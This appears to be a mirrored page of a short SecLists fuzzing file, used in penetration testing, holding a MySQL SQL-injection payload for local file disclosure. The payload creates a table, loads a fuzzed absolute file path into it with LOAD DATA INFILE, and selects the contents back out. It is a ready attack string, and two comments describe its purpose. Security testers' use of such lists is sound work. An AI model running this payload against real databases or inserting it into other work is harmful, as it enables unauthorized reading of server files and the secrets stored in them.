mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-04-28 17:56:28 -04:00
3 lines
210 B
Text
3 lines
210 B
Text
# mysql local file disclosure through sqli
|
|
# fuzz interesting absolute filepath/filename into <filepath>
|
|
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|